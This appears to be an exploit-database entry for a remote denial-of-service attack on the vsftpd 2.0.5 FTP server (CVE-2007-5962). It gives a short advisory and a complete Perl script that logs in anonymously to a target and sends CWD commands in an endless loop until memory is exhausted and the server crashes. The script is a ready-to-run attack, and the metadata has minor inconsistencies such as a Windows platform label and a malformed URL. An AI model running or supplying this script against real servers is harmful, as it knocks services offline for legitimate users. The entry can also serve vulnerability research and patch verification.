[] NeoSense

vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)

Author: Praveen Darshanam
type: dos
platform: windows
port: 
date_added: 2008-05-21 
date_updated: 2016-12-07 
verified: 1 
codes: CVE-2007-5962;OSVDB-45626 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comvsftpd-2.0.5.tar.gz

source: https://www.securityfocus.com/bid/29322/info


The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

#!/usr/bin/perl -w


#######################################################################################
#vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
#Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
#
#Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
#option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
#
#I tried to modify local exploit found at securityfocus such that we can remotely exloit
#
# Author shall not bear any responsibility
#Author:Praveen Darshanam
#Email:praveen[underscore]recker[at]sify.com
#Date:07th June, 2008
#
#
########################################################################################


use Net::FTP;
$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";

while(1)
{
#this loop runs infinitely

    $ftp -> cwd();
}

$ftp->quit;